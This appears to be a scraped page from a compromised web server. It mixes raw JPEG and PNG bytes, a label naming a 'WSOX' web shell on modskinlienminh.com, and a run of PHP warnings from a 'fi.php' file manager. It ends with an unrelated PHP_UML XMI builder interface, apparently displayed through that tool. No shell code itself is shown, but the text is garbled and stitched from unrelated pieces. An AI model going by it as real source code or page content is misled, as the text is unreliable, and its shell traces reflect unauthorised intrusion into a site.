1:45 PM 11/12/2025 ���� JFIF    �� �        "" $(4,$&1'-=-157:::#+?D?8C49:7 7%%77777777777777777777777777777777777777777777777777��  { �" ��     �� 5    !1AQa"q�2��BR��#b�������  ��  ��   ? ��D@DDD@DDD@DDkK��6 �UG�4V�1�� �����릟�@�#���RY�dqp� ����� �o�7�m�s�<��VPS�e~V�چ8���X�T��$��c�� 9��ᘆ�m6@ WU�f�Don��r��5}9��}��hc�fF��/r=hi�� �͇�*�� b�.��$0�&te��y�@�A�F�=� Pf�A��a���˪�Œ�É��U|� � 3\�״ H SZ�g46�C��צ�ے �b<���;m����Rpع^��l7��*�����TF�}�\�M���M%�'�����٠ݽ�v� ��!-�����?�N!La��A+[`#���M����'�~oR�?��v^)��=��h����A��X�.���˃����^Ə��ܯsO"B�c>; �e�4��5�k��/CB��.  �J?��;�҈�������������������~�<�VZ�ꭼ2/)Í”jC���ע�V�G�!���!�F������\�� Kj�R�oc�h���:Þ I��1"2�q×°8��Р@ז���_C0�ր��A��lQ��@纼�!7��F�� �]�sZ B�62r�v�z~�K�7�c��5�.���ӄq&�Z�d�<�kk���T&8�|���I���� Ws}���ǽ�cqnΑ�_���3��|N�-y,��i���ȗ_�\60���@��6����D@DDD@DDD@DDD@DDD@DDc�KN66<�c��64=r����� ÄŽ0��h���t&(�hnb[� ?��^��\��â|�,�/h�\��R��5�? �0�!צ܉-����G����٬��Q�zA���1�����V��� �:R���`�$��ik��H����D4�����#dk����� h�}����7���w%�������*o8wG�LycuT�.���ܯ7��I��u^���)��/c�,s�Nq�ۺ�;�ך�YH2���.5B���DDD@DDD@DDD@DDD@DDD@V|�a�j{7c��X�F\�3MuA×¾hb� ��n��F������ ��8�(��e����Pp�\"G�`s��m��ާaW�K��O����|;ei����֋�[�q��";a��1����Y�G�W/�߇�&�<���Ќ�H'q�m���)�X+!���=�m�ۚ丷~6a^X�)���,�>#&6G���Y��{����"" """ """ """ """ ""��at\/�a�8 �yp%�lhl�n����)���i�t��B�������������?��modskinlienminh.com - WSOX ENC ‰PNG  IHDR Ÿ f Õ†C1 sRGB ®Îé gAMA ± üa pHYs à ÃÇo¨d GIDATx^íÜL”÷ð÷Yçªö("Bh_ò«®¸¢§q5kÖ*:þ0A­ºšÖ¥]VkJ¢M»¶f¸±8\k2íll£1]q®ÙÔ‚ÆT h25jguaT5*!‰PNG  IHDR Ÿ f Õ†C1 sRGB ®Îé gAMA ± üa pHYs à ÃÇo¨d GIDATx^íÜL”÷ð÷Yçªö("Bh_ò«®¸¢§q5kÖ*:þ0A­ºšÖ¥]VkJ¢M»¶f¸±8\k2íll£1]q®ÙÔ‚ÆT h25jguaT5*!
Warning: Undefined variable $authorization in C:\xampp\htdocs\demo\fi.php on line 57

Warning: Undefined variable $translation in C:\xampp\htdocs\demo\fi.php on line 118

Warning: Trying to access array offset on value of type null in C:\xampp\htdocs\demo\fi.php on line 119

Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in C:\xampp\htdocs\demo\fi.php on line 120

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 247

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 248

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 249

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 250

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 251

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 252
* @license http://www.gnu.org/licenses/lgpl.html LGPL License 3 * @version SVN: $Revision: 138 $ * @link http://pear.php.net/package/PHP_UML * @since $Date: 2009-12-13 04:23:11 +0100 (dim., 13 déc. 2009) $ */ /** * Interface for the XMI generation * * @category PHP * @package PHP_UML * @subpackage Output * @subpackage Xmi */ interface PHP_UML_Output_Xmi_Builder { /** * Retrievesthe XMI header * * @return string XMI code */ function getXmiHeaderOpen(); /** * Closing tag for the XMI header * * @return string XMI code */ function getXmiHeaderClose(); /** * Retrieves the opening tag for a model * * @param string $model Root package * * @return string XMI code */ function getModelOpen(PHP_UML_Metamodel_Package $model); /** * Retrieves the closing tag of a model * * @return string XMI code */ function getModelClose(); /** * Retrieves the opening tag for a package * * @param PHP_UML_Metamodel_Package $package Package to insert * * @return string XMI code */ function getPackageOpen(PHP_UML_Metamodel_Package $package); /** * Retrieves the closing tag of a package * * @return string XMI code */ function getPackageClose(); /** * Retrieves the opening namespace tag (XMI 1 only) * * @return string XMI code */ function getNamespaceOpen(); /** * Retrieves the closing namespace tag (XMI 1 only) * * @return string XMI code */ function getNamespaceClose(); /** * Retrieves the opening tag for a sub-system (XMI 1), or a component (XMI 2) * * @param PHP_UML_Metamodel_Package $package Package to code as a subsystem * * @return string XMI code */ public function getSubsystemOpen(PHP_UML_Metamodel_Package $package); /** * Retrieves the closing tag for a subsystem / component * * @return string XMI code */ function getSubsystemClose(); /** * Retrieves the necessary stereotypes * * @return string XMI code */ function getStereotypes(); /** * Retrieves the XMI code for a given stereotype * * @param PHP_UML_Metamodel_Stereotype $s Stereotype */ function getStereotypeInstance(PHP_UML_Metamodel_Stereotype $s); /** * Retrieves the XMI declarations of the main PHP types * * @param PHP_UML_Datatype $type Datatype * * @return string XMI code */ function getDatatype(PHP_UML_Metamodel_Datatype $type); /** * Retrieves the XMI code for a class * * @param PHP_UML_Metamodel_Class $class Class * * @return string XMI code */ function getClass(PHP_UML_Metamodel_Class $class); /** * Retrieves the XMI code for an interface * * @param PHP_UML_Metamodel_Interface $interface Class * * @return string XMI code */ function getInterface(PHP_UML_Metamodel_Interface $interface); /** * Retrieves the XMI code for an operation * * @param PHP_UML_Metamodel_Operation $operation Operation * * @return string XMI code */ function getOperation(PHP_UML_Metamodel_Operation $operation); /** * Retrieves the XMI code for the paramater of an operation * * @param PHP_UML_Metamodel_Parameter $parameter Parameter * * @return string XMI code */ function getParameter(PHP_UML_Metamodel_Parameter $parameter); /** * Retrieves the XMI code for an artifact * * @param PHP_UML_Metamodel_Artifact $file File to add as an artifact * @param array &$mf Manifested elements * (array of PHP_UML_Metamodel_Class) * * @return string XMI code */ function getArtifact(PHP_UML_Metamodel_Artifact $file, &$mf = array()); /** * Retrieves the XMI code for a component * * @param PHP_UML_Metamodel_Package $package Package to add as a component * @param array $provided Set of providing classes * @param array $required Set of required classes (TODO) * * @return string XMI code */ function getComponentOpen(PHP_UML_Metamodel_Package $package, array $provided, array $required); /** * Retieves the closing tag for a component * * @return string XMI code */ function getComponentClose(); /** * Retrieves the XMI code for a classifier (datatype, class, interface) * Required by getParameter(). Adds the default value (if any) * * @param PHP_UML_Metamodel_TypedElement $parameter Element (datatype, class..) * * @return string XMI code */ function getParameterType(PHP_UML_Metamodel_TypedElement $parameter); /** * Retrieves the XMI code for all the realization (= interface implementations) * of a given element * * @param PHP_UML_Metamodel_Class $client Child element * * @return string XMI code */ function getRealizations(PHP_UML_Metamodel_Class $client); /** * Retrieves the XMI code for all the inherited classes of a given element * * @param PHP_UML_Metamodel_Type $client Child element * * @return mixed In XMI 1.x, this returns an array, because XMI 1 needs two * declarations: the child element must be defined as "generalizable", in * addition to the generalization relationship. In XMI 2, only the relationship * is necessary, which is returned as a string. */ function getGeneralizations(PHP_UML_Metamodel_Type $client); /** * Adds a description/comment to a model element * The description is given through a stereotype instance * * @param PHP_UML_Metamodel_Stereotype $s A stereotype object * @param string $annotatedElement The commented element * * @return string XMI code */ function getComment(PHP_UML_Metamodel_Stereotype $s, $annotatedElement=''); /** * Retrieves the XMI code for a UML2 profile. * * @return string XMI code */ function getProfile(); /** * Retrieves the metadata related to a given tag * * @param PHP_UML_Metamodel_Tag $tag Tag * * @return string XMI code */ public function getMetadata(PHP_UML_Metamodel_Tag $tag); } ?>